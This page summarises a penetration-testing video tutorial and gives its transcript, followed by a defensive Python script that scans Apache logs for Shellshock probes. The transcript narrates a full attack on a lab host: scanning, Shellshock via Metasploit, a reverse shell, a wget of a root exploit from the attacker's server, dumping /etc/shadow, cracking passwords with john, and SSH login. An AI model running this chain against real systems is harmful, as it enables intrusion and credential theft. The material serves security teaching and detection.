Simple Penetration Testing Tutorial for Beginners!

Loi Liang Yang
18 Mar 2022 · 15:25

Summary

TLDR: The video script offers a step-by-step tutorial on ethical hacking, focusing on scanning devices for vulnerabilities and exploiting them to gain control of a system. It covers the use of tools like nmap for scanning, dirb for directory listing, and metasploit for exploiting found vulnerabilities. The tutorial also delves into privilege escalation, capturing credentials, and emphasizes the importance of security testing to protect servers from such attacks.

Takeaways

  • The video is an educational tutorial on ethical hacking techniques, emphasizing that hacking is illegal and should not be attempted without permission.
  • It covers the process of scanning devices to identify vulnerabilities, including servers and phones, to gain control over the system.
  • The tutorial explains the importance of finding a loophole in the system to exploit for gaining unauthorized access.
  • It demonstrates the use of tools like nmap for scanning target devices and identifying open ports and services.
  • The script mentions the significance of determining the operating system and version to tailor the attack method effectively.
  • The tutorial includes using dirb to discover directories on a server, which can be potential targets for exploitation.
  • It introduces Metasploit (msfconsole) for launching targeted attacks against discovered vulnerabilities.
  • Post-exploitation techniques are discussed, such as escalating privileges to gain root access and control over the system.
  • The video shows how to dump usernames and passwords from a compromised system for further exploitation.
  • It highlights the importance of defense mechanisms, like firewalls, to block unauthorized access but also their limitations.
  • The process of uploading and executing files to escalate privileges is illustrated, including overcoming permission issues.

Q & A

  • What is the main topic of the video script?

    -The main topic is end-to-end ethical hacking, specifically scanning devices and exploiting vulnerabilities to gain control of computer systems.

  • What tool is recommended for scanning target devices?

    -The tool recommended for scanning target devices is Nmap.

  • Why is it important to scan devices before attempting an exploit?

    -It is important to scan devices to identify vulnerabilities, such as open ports and running services, which can be exploited to gain control of the system.

  • What does 'elevating privileges' mean in the context of hacking?

    -Elevating privileges means gaining higher-level access permissions on a system, typically from a regular user account to root or administrative access.

  • What is the purpose of using the 'dirb' tool in this hacking tutorial?

    -The 'dirb' tool is used to discover directories and files on a web server that might be vulnerable to exploitation.

  • What is the significance of the 'CGI bin' directory in the script?

    -The 'CGI bin' directory is significant because it often contains executable scripts that can be exploited to gain access to the system.

  • How is Metasploit used in the hacking process described in the script?

    -Metasploit is used to find and exploit vulnerabilities in the target system, particularly using the 'shellshock' exploit in this tutorial.

  • What is a 'reverse shell' and why is it useful for hackers?

    -A reverse shell is a method where the target machine connects back to the hacker's machine, bypassing firewall restrictions that block inbound connections, allowing the hacker to control the system remotely.

  • What is the final goal of the hacking process described in the script?

    -The final goal is to gain root access to the target system and extract sensitive information, such as usernames and passwords.

  • Why does the script emphasize the illegality of hacking?

    -The script emphasizes the illegality of hacking to remind viewers that these techniques should not be used for malicious purposes and to warn against attempting these actions without permission.

Outlines

00:00

😲 Introduction to Ethical Hacking Techniques

The script begins with a cautionary introduction to ethical hacking, emphasizing the illegality of hacking unless it's for educational purposes or authorized penetration testing. It outlines a step-by-step approach to scanning devices for vulnerabilities, exploiting them to gain control of a computer system, and elevating privileges post-exploitation. The tutorial uses a hypothetical scenario involving a hacker's computer targeting a system, highlighting tools like nmap for scanning and identifying services, and the importance of identifying operating system versions to tailor attacks effectively.

05:01

Scanning and Directory Enumeration in Hacking

This paragraph delves into the process of scanning for services using nmap, with specific flags to identify service versions and operating systems. It then introduces dirb, a tool for directory enumeration to uncover potential entry points on a server. The script describes targeting 'cgi-bin' directories, which are common gateway interfaces for web servers, and using metasploit to find and exploit vulnerabilities. The goal is to gain a reverse shell, which allows the hacker to maintain access despite firewall restrictions, by sending an exploit and payload to the target system.

10:02

Gaining Root Access and Privilege Escalation

The script continues with a demonstration of privilege escalation, where the hacker uploads a malicious file to gain root access. It explains the process of using tools like mousepad to edit files, and the challenges faced with permissions when uploading files to a target system. The narrative includes a workaround by hosting the file on the hacker's server and having the target download it. Once executed, the hacker gains root access, allowing them to read sensitive information like usernames and passwords from '/etc/shadow' and '/etc/passwd', and ultimately crack the passwords using 'john', a password cracking tool.

15:03

Importance of Server Security and Testing

The final paragraph wraps up the tutorial by stressing the importance of server security. It advises on the necessity of regular testing and scanning to identify and rectify misconfigurations and missing security patches. This proactive approach helps prevent exploits and ensures that production workloads are protected. The script concludes with an invitation to like, share, and subscribe for more ethical hacking tutorials, underlining the educational value of understanding hacking techniques for defensive purposes.
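A defender-side check for the attack path summarized above, as an added example that is not from the video: the tutorial's web exploit delivers a bash function definition in an HTTP header to a script under /cgi-bin/, which leaves a recognizable marker in Apache access logs. The log lines, addresses and the script name `example.sh` are constructed for illustration, and the sketch assumes Apache's combined log format.

```python
import re
from dataclasses import dataclass

# Apache "combined" log format (assumed):
#   host ident user [time] "request" status bytes "referer" "user-agent"
# Apache writes embedded double quotes as \" so quoted fields allow escapes.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
COMBINED = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) \S+ '
    + QUOTED + ' ' + QUOTED + r'$'
)

# Marker of a bash function definition placed in a request field.
# Spacing between the tokens varies between tools, so allow any amount.
FUNC_DEF = re.compile(r'\(\s*\)\s*\{')


@dataclass
class Finding:
    host: str
    time: str
    path: str
    status: int
    where: str      # which logged field carried the marker
    severity: str   # "high" or "low"


# Constructed sample log lines (not taken from the video).
SAMPLE_LOG = r'''
192.0.2.10 - - [18/Mar/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.66 - - [18/Mar/2022:10:02:10 +0000] "GET /cgi-bin/example.sh HTTP/1.1" 200 13 "-" "() { :;}; echo constructed-probe"
192.0.2.66 - - [18/Mar/2022:10:02:11 +0000] "GET /index.html HTTP/1.1" 404 210 "() { x; }; echo constructed-probe" "curl/7.81.0"
192.0.2.20 - - [18/Mar/2022:10:03:00 +0000] "GET /cgi-bin/example.sh HTTP/1.1" 200 13 "-" "Mozilla/5.0 (compatible; \"quoted\" agent)"
'''


def scan_access_log(log_text):
    """Return a Finding for every request whose logged fields carry the marker."""
    findings = []
    for raw in log_text.splitlines():
        m = COMBINED.match(raw.strip())
        if not m:
            continue  # blank line or not in combined format
        host, when, request, status, referer, agent = m.groups()
        parts = request.split()
        path = parts[1] if len(parts) >= 2 else ""
        fields = {"request": request, "referer": referer, "user-agent": agent}
        hit = next((n for n, v in fields.items() if FUNC_DEF.search(v)), None)
        if hit is None:
            continue
        # A 2xx answer from a CGI path means the request reached a script
        # handler. That is a reason to inspect the host, not proof of compromise.
        reached_cgi = path.startswith("/cgi-bin/") and status.startswith("2")
        findings.append(Finding(host, when, path, int(status), hit,
                                "high" if reached_cgi else "low"))
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f.severity:4} {f.host} {f.time} {f.path} "
              f"status={f.status} marker-in={f.where}")
```

A "high" finding is a prompt to check the bash patch level on that host and to review outbound connections made by the web server account around the logged time.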

Keywords

Hacking

Hacking refers to the unauthorized access or manipulation of computer systems or networks. In the context of the video, hacking is portrayed as a method to scan for vulnerabilities and gain unauthorized control over a system. The script emphasizes the illegality of hacking and uses it as a theme to educate viewers on cybersecurity.

Vulnerability

A vulnerability is a weakness in a system that can be exploited by hackers. The video script discusses finding vulnerabilities within a system to gain control, illustrating the importance of identifying and patching these weaknesses to maintain system security.

Post-Exploitation

Post-exploitation refers to the actions taken by an attacker after gaining initial access to a system. The script explains that once inside a system, an attacker may attempt to elevate privileges, which is a key part of post-exploitation activities to gain deeper control over the compromised system.

nmap

nmap is a popular open-source tool used for network discovery and security auditing. In the script, nmap is used to scan target devices for open ports and running services, which is a fundamental step in identifying potential vulnerabilities.

Services

Services in the context of the video refer to the functionalities provided by a system, such as FTP, SSH, or HTTP servers. The script mentions scanning for services to understand what the target system offers and to find potential attack vectors.

Ports

Ports are endpoints on a networked system for specific types of communication. The video script discusses targeting ports as part of the scanning process to identify which services are available and potentially vulnerable.

Exploit

An exploit is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a vulnerability in a system. The script describes using exploits to take control of a system after identifying a vulnerability.

Metasploit

Metasploit is a penetration testing framework that helps find, exploit, and validate vulnerabilities. The script mentions using Metasploit to search for and utilize exploits against a targeted server.

Reverse Shell

A reverse shell is a technique used by attackers to connect back to their own system, allowing them to maintain access even if the initial entry point is closed. The video script explains the use of a reverse shell to bypass potential network restrictions.

Privilege Escalation

Privilege escalation is the act of exploiting a bug, vulnerability, or configuration weakness that allows an attacker to gain higher access rights. In the script, privilege escalation is discussed as a means to gain root access after initially compromising a system.

Password Cracking

Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a system. The script describes using password cracking tools like 'john' to break hashed passwords and gain further access to a system.

Highlights

Introduction to end-to-end ethical hacking, emphasizing the illegality of hacking without permission.

Scanning devices to identify vulnerabilities in various systems like servers and phones.

Finding and exploiting vulnerabilities to gain control over a device.

Post-exploitation techniques to elevate privileges and gain complete system control.

Identifying services like FTP, SSH, and HTTP to target weaknesses.

Using nmap for scanning target devices and listing services and their versions.

Determining attack methods based on identified services and their versions.

Launching targeted attacks on services like web servers and FTP.

Using dirb to discover directories that may contain exploitable files.

Targeting CGI scripts as potential entry points for exploitation.

Utilizing Metasploit Framework (msfconsole) to search for and use exploits.

Configuring exploit options such as target URI and HTTP user agent header.

Executing a reverse shell to bypass firewalls and establish a connection.

Dumping usernames and passwords from a compromised system.

Elevating privileges using a malicious file uploaded to the target server.

Compiling and executing a file to gain root access on the compromised system.

Using password cracking tools like John the Ripper to break hashed passwords.

SSHing into the compromised server using cracked credentials.

Emphasizing the importance of regularly testing and scanning servers for vulnerabilities.

Transcripts

00:00

And yes, today we'll be learning end-to-end ethical hacking by going after a specific system, and we're learning step by step what we can do exactly to scan a device and then, after which, to be able to gain complete control of the entire computer system. And remember kids, hacking is illegal. If you want to run any of these ethical hacking techniques, do not try it on Mr. Hackaloy.

00:24

[Music]

00:33

Number one, we'll be learning about what we can do in terms of scanning devices. All right, so when we scan a device we're trying to look out for vulnerabilities, and it could be a server, it could be a phone, it could be any of these devices that you're trying to go after.

00:45

Number two, what we're trying to do here is to find a vulnerability inside the system that we can take advantage of. So once we find a loophole, all right, we will be able to gain complete control of the device.

00:56

And once we're in, the question mark is going to be: what else can we do? All right, so once you're in, what is it we can do in terms of post exploitation? All right, what can we do to elevate our privileges to be able to gain complete control of the system, to even break the password of the computer?

01:12

So as you can see right here on the left side, we have the hacker computer. All right, so this is the hacker, and what the hacker wants to do is then to be able to first scan and then list down all of those services. For example, do they have a file transfer protocol server, do they have a secure shell being opened up, do they have a website running, so that we can take advantage of those weaknesses within it, and so on and so forth.

01:34

And once we're able to list down all of this, we can get the version, and then from there we can determine, all right, what are the different attack methods that we can go after. So right here, this is the place where we'll be thinking and deciding about what are the different types of attack methods that we can use. Then after which we can launch a target against, say, the website, okay, launch an attack against the FTP server, into secure shell, whichever the case is, once we have uncovered an exploit to use. And once we're in right here, into the system, right, what we want to do then is to elevate our privileges so that from a normal user we now have the ability to get root access, meaning that we can literally do anything we want with the device.

02:11

Remember, smash the like button and turn on notifications so that you don't get hacked.

02:14

So right in front of us we're in Kali Linux, and the first thing you want to do is go ahead and open up terminal. And once you're on terminal, what you want to do right here is to have the ability to begin scanning the device or the server or the system, however you want to call it.

02:26

So the first thing you want to do is enter nmap. So nmap is going to be the tool that we'll use to help us scan the target device. So here when you enter nmap you can see all the options that are available for us to scan the device, to look out for all the services. So literally like knocking on the door of the house, trying to scan a house, looking out for openings that we can then of course be able to jump into the house and take out, for example, the cash and the valuables and the jewelries.

02:55

Right, so this is exactly what we'll be doing as part of launching the attack. So the first thing you want to do is to scan the IP address or the hostname or the domain name. The goal is that now you have a target in mind.

03:04

So you can enter, for example, the following, which is nmap, and what we want to do now is to enter, say, 192.168.0.114, so this is going to be the target device that we're going after. So in this case I can enter dash s followed by V, so this is for the service version that we're going after, dash capital O for the operating system version. So we want to know whether it is a Linux, what version of Linux is it; if it is a Windows computer, what version of Windows computer is it running on. And then after which we want to target the ports. So ports are the services that can be made available from the target device. So in this case we can target, say, from port one all the way to six five five three five.

03:41

So once you're done with that, hit enter, and of course we're asked to enter superuser do, all right, because it requires root privileges. So enter on that, enter your password, hit enter, and now we're scanning the device to look up for all these different services that are running on the server.

03:54

And now the scan is completed. So right here you can see the following, all right, we have all these different port numbers, all right, followed by the protocol, so in this case there could be protocols like transmission control protocol, and the state is of course open. And you can see at the same time what kind of service is it running on, is it a file transfer protocol, secure shell, all right, HTTP, IPP and all of that. All right, so all of their services as well as the version on the most right side. So this is a really wonderful way to quickly identify, all right, all of these different services, all of the different versions, and once you have the version you can then determine what kind of exploit you want to use to go after all these different types of services so that you can have access into the system.

04:34

And for today's case we will be targeting on Apache, and so you can see right here we have http 2.4.7, so we'll be targeting the following. So as part of the targeted device, all we got to do is just go ahead and enter the domain name or the IP address here, and you can see right here this is the directory listing, so you can see all of the directories, the files within it. So you can always click around to do your enumeration and find out, right, what is going on. So this is a really quick way for you to look out for all these different ways and all these different services that can be helped fd for example in this case the Apache, the web server level.

05:06

And what we can do next is jump over to use a tool called dirb. So this is a way for us to be able to look out for all the different directories that are held by the server, so that we can possibly look out for some of these openings which can give us an access into the server. Okay, so here you can see the following, all right, all these are different options available, and you can just simply enter the following. All right, so here we go, all these examples: dirb followed by the protocol, of course in this case http, and of course you have the URL and of course a targeted directory. So all you got to do now is enter dirb. Okay, let me go ahead and clear this.

05:40

Enter d-i-r-b followed by http 192.168.0.114, and once you're done with that go ahead and hit enter, and you can see right here, okay, we're scanning and we're looking out for some really interesting thing. And as you can see, we're done, so all we're going to do is scroll all the way back to the top and look up for any interesting results. And one of those interesting results that we want to target is the one right here, okay, so this is cgi-bin, and this is a place where we're going to target the exploits.

06:06

Next up, what we really want to do is to figure out what is really in cgi-bin. So all I got to do is enter dirb followed by slash cgi dash bin slash, hit enter on that. So we're trying to figure out, are there any files within it. So you can see right here we have the following, all right, we have the cgi-bin and of course we have the hello world dot sh, so this is the area for us to target. And CGI stands for common gateway interface, and it is a way for the web server to interact with external content generating programs and so on and so forth. So we'll be leveraging on this CGI for us to be able to gain access into the system.

06:44

So what we can do now is to use a really handy tool called Metasploit. So you can go ahead and enter sudo msfconsole, hit enter on that, and this will start up Metasploit. And what we are looking out for here in this case is to look for an exploit that we can use as part of targeting the server. So all you got to do is enter search shellshock, hit enter on that, and here we have several options available for us. So we'll be using one of that over here, so this is the one that we'll be targeting to use, so it is going to be under exploit multi http apache mod cgi bash environment execute. So all we're going to do now is enter use, all right, followed by one, and once you do that you can see the following, all right, so we have exploit multi http apache mod cgi bash env exec. All right, so you can enter show options, specify the option as part of targeting the server. So all we got to do now is go ahead and take a look at the following, all right, so we have the header, so we'll be using the HTTP user agent header, so this is all the values you want to send. So here we have the set rhost, and of course we have the rpath, and we have the target URI you have discovered, so go ahead and hit enter on that.

07:44

And the reason why we need a reverse shell is because the hacker wants to have taken advantage of a vulnerability and they have sent the exploit as well as the payload. What happened is that if they try to open up a service, all right, so when they open up a service so that they can then finally be able to access over into the system, you realize that they'll get blocked. The reason why they could get blocked is because there is a firewall right here. So the firewall will be inspecting all this different traffic and of course at the same time filter out all these unnecessary ports that could be opened up, or all these different services that could be opened up. As a result of that, what the hackers want to do is, once they have exploited in the system, they want to force a reverse connection outwards. The reason is because a lot of all these different firewalls, they allow or complete outbound access, all right, so meaning that they do not restrict a lot of all these different outbound connectivities to the internet.

08:36

Once you're ready, in three, two, one, hit exploit, and you can see right here: meterpreter session two open, and we have the following, okay.

08:48

That's it, we are in, it is game over, it's as simple as that. And once we're in, I can enter sysinfo and you can see the IP address, the OS, the architecture and all of the data.

08:59

So quickly now, what we want to do is to be able to dump out the usernames and passwords within the computer system. So what I can do now is enter shell and see where we get. All right, so once we're in here I can enter whoami, and you notice that we're on www dash data. All right, let's see whether we are going to be able to do a cat etc shadow, and this is the place where all this important information, usernames and all this data are there. So we are not able to do that. I can enter pwd, so we have print working directory. So we have fairly limited access into the system.

09:32

No worries, I will teach you how we can elevate our privileges in the system. So here we have a pretty good example, all right, so here we have the following of 2021 0903 and we have 37292.c, all right, so this is the one we'll be using as part of sending and uploading into the server so that we can elevate our privileges. Okay, so all we're going to do now is enter, say, touch 37292.c. Okay, once you've entered on that, you can enter, say, mousepad 37292.c, hit enter on that, and all you got to do is just literally just copy and paste whatever you're seeing right here and go ahead and send it over into the file. So save it into file, and once you're done with that go ahead and close mousepad.

10:14

And what we can do now is jump back over into terminal, right, and what we can do is go back into meterpreter, and what we can do next is to upload the file. So once we're in meterpreter, all we're going to do is enter upload, all right, followed by slash loyalian desktop slash 37292.c, hit enter on that, and see the following: operation fail. And the reason why you may be getting this is because we do not have the right permission. So if I go and enter shell, so we're in right now, so I enter pwd, if I try to do, say, touch abc, all right, hit enter on that: cannot touch abc, permission denied.

10:47

So we can exit from here, and now what we can do is to think about whether we can upload this file into our own server and then after which, from, all right, the target or the session that we currently have, download the file and be able to run some other directories. So going back into another terminal, all you're going to do is enter sudo systemctl, all right, followed by start apache2.service, hit enter on that, enter your password, and this would help us start up the Apache server so that we can host our malicious file. So what you can do now is go ahead and enter copy 37292 into var www html slash, hit enter on that. So done, we're able to now host this file over, and then the target user can now download that file.

11:36

So what I can do now is go ahead and say cd over slash tmp, all right, so this is a directory that's available in pretty much all of the Linux servers so that we can write a temporary file in. So what I can do now is go ahead, do the following: enter shell and do wget http 192.168.0.192 followed by slash, all right, 37292.c, hit enter on that.

12:01

Oh my, are you seeing that? We just downloaded the file, meaning that we are now able to execute on this by doing the following. Okay, so all we're going to do now is enter gcc 37292.c and then we want to output this over to, say, follow ofs. Okay, so done, and next up we can do a chmod plus x to make this executable, ofs, done. Enter dot slash ofs, hit enter on that.

12:27

Guess what, all right, whoami: we got root, we're in, we have complete control over the entire system. So what we want to do now is to be able to break the usernames and passwords on the Linux server. Yes, I know this is pretty crazy stuff. So what I can do now is go ahead and enter, say, cat etc shadow, hit enter on that, and we have all these different details, and you can save them all up into a file. All right, so in this case we can save all of this into a shadow file on Kali Linux. Next up, what we want to do is enter cat etc passwd, hit enter on that as well, and likewise we want to save this, all right, over into a file on Kali Linux so that we can do our password breaking.

13:05

So I've already saved up the file and you'll be able to see the following. So I can do a cat shadow, all right, hit enter on that, and we can see, all right, the exact same file right here, and we have many interesting users like Anakin Skywalker, Darth Vader, all these really interesting Star Wars characters. So next up, what we can do is likewise we can do a cat passwd, all right, so here same thing, we're seeing all the exact same copy from the Linux server over into a Kali Linux machine. So what we can do next is to go ahead and enter unshadow, all right, followed by passwd, followed by shadow, and then what we can do now is output it into unshadowed dot txt. All right, so go ahead and hit enter on that.

13:45

All right, so done. Okay, what we can do next is to use john. John is going to be a password cracking software we'll use as part of breaking into that file. So what we can do now is enter john followed by the wordlist equal, all right, so in this case we can enter usr share wordlists followed by rockyou.txt, okay, and then after which target the unshadow.txt, and then three, two, one, hit enter on that.

14:11

You can see the following, okay, over here it states loaded one password hash. Okay, so all we're gonna do right now is just do the following by entering show. So you can enter john show, now we can enter unshadowed dot txt, hit enter on that. We got the following here, okay, so we got vagrant vagrant, so here we got the username as well as the password field, just like that.

14:32

Remember, earlier we had a secure shell service that's available, so what we can do now is go ahead and enter ssh vagrant at 192.168.0.114 and hit enter on that. Now we can enter the password, all right, which is vagrant as well. What the heck, we are in, we have a connection over into the Linux server using a broken username and password.

14:53

In terms of defense, it's really important and critical to always be testing, scanning your different servers that you have, because they could be hosting a lot of production workloads, and you want to ensure that there's no misconfiguration, there are no missing security patches, so that all these different types of exploits cannot be easily conducted against your servers.

15:16

So once again, I hope you learned something valuable in today's tutorial. So like, share, subscribe and turn on notifications so that you can be kept abreast of the latest ethical hacking tutorials.

Related Tags
Ethical Hacking, System Security, Vulnerability Scanning, Exploit Techniques, Cybersecurity, Hacking Tutorial, Network Security, Penetration Testing, Security Breach, Hacker Tools